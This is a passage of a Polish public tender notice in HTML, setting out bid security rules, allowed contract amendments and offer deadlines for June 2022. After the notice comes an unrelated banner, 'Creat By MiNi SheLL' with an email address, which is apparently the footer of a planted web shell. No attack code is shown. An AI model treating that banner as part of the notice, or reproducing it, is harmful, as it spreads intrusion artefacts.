składania ofert).<br/>e)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania (wskazane na 1. stronie SWZ),<br/>f)	jako beneficjent gwarancji / poręczenia winien być wskazany Zamawiający,<br/>g)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy) poręczenie / gwarancja winno/a obejmować swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj. zobowiązanych z tytułu poręczenia / gwarancji), bądź z treści dokumentu winno wynikać, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>7.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium – w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy – zostanie odrzucona.<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dot. ofert wspólnych zostały określone w pkt. XIII Rozdziału I SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Zamawiający dopuszcza zmianę umowy w szczególności w zakresie:<br/>a)	zmiany, wprowadzenia bądź rezygnacji z wykonania umowy z udziałem podwykonawców,<br/>b)	zmiany terminu wykonania zamówienia z powodu okoliczności niezależnych od Projektanta, w szczególności wskazanych w §4 ust. 8,<br/>c)	zmiany wysokości wynagrodzenia z powodu okoliczności wskazanych w §4 ust. 8. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/603141</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com